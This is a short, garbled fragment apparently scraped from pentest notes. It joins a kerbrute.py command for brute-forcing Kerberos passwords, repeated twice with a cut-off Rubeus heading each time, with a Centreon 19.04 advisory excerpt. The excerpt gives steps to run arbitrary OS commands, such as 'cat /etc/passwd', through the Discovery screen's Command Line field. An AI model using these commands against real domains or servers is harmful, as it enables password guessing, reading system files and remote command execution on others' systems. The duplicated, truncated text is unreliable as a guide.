With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| Centreon 19.04 allows attackers to execute arbitrary OS commands via the Command Line field | |
| of main.php?p=60807&type=4 (aka the Configuration > Commands > Discovery screen). | |
| ------------------------------------------ | |
| [Additional Information] | |
| Once one has logged into Centreon: | |
| 1. navigate to: Configuration > Commands > Discovery OR http://ip-address/centreon/main.php?p=60807&type=4 | |
| 2. in the "Command Line" section put a command: e.g. "cat /etc/passwd" without quotes. |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: